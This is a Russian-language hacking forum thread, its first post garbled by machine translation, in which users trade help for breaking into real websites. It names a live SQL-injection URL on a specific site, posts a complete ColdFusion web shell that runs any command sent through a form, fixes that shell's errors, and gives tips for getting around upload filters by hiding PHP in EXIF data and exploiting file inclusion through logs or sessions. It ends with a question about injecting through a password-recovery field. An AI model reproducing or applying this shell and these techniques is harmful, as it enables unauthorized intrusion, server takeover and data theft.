Url уязвим http://slingogaming.com/slingo_casino_news-story.php?id=-2+UNION+SELECT+1--+ Проблема в том, что я нашел админ-панели http://slingogaming.com/admin/account/ , а также имя пользователя администратора и пароль электронной почте, но не подал выхода Так что теперь я хочу, чтобы загрузить на него снаряд и mysql.user: Host, пользователь, пароль и нашли поэтому, пожалуйста, теперь, как я могу загрузить оболочки на нем, либо получить. База данных SQL
PHP: < html> < body> < cfoutput> < table> < form method="POST" action="cfexec.cfm"> < tr> < td>Command:</td> < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td> </tr> < tr> < td>Options:</td> < td> < input type=text name="opts" size=50 < cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td> </tr> < tr> < td>Timeout:</td> < td>< input type=text name="timeout" size=4 < cfif isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5" </cfif> > </td> </tr> </table> < input type=submit value="Exec" > </FORM> < cfsavecontent variable="myVar"> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> </cfexecute> </cfsavecontent> < pre> #myVar# </pre> </cfoutput> </body> </html> https://forum.antichat.ru/thread71680.html
я это заливал, но учитывая что я с cfm ниразу, то хз почему н работает(всмысле то что я не могу найти ответ почему выдаёт ошибку) Code: The error occurred in E:\Inetpub\**\123.cfm: line 24 22 : 23 : < cfsavecontent variable="myVar"> 24 : < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> 25 : </cfexecute> 26 : </cfsavecontent>
Во-первых, теги правильно пиши - убери пробелы до и после знаков ">" и "<". Во-вторых, имя файла должно быть "cfexec.cfm" либо поменяй в строке PHP: <form method="POST" action="cfexec.cfm> название файла на своё.
ребят не могу залить шелл, в админке есть место для загрузки картинок,но стоит хороший фильтр и на стороне сервера и на JS.. при загрузке php файла вылетает aкошка JS и говорит что нельзя этот формат и тп, но файл все же загружается, но когда иду по линку файла то виден только один символ и пустая страница то есть если контент файла PHP: <?php phpinfo (); ?> то на странице видна только символ '<' остальное вырезается, попробовал загрузить в разных форматах..не катит на сайте еще есть LFI, впихнул пхп код в конце гиф файлa чтоб инклудить, нo фильтр обрезал пхп и оставил только сорцы gif.. вот такая печальная история,нужен профи) поделитесь советами plz
А ты запиши в EXIF, а не в конец файла, и, если картинка меняет размер после заливки (скриптом), то попробуй залить картинку такого же размера, как и тестируемая - может и прокатит PS: Ну и потом, если есть LFI - есть и куча других способов - логи, сессия и etc.
sql inj - восстановление пароля всем привет. буду краток...с мобильного. выяснил, что данные из поля для восстановления пароля участвуют в запросе: select * from utbl where user=`[email protected]' or email='[email protected]' при ошибке выводится тело запроса...как выше ' - проходит в запрос ; - в исходниках страницы показан как &#(цифры) или как-то так, не помню. " - в каком виде, не проверил. вопрос: можно ли провести inj или что выжить из этого по максимуму?
Пля.. проверил, ' и " не проходят... попадают в запрос как &# 039; и " Что в данном случае можно сделать?
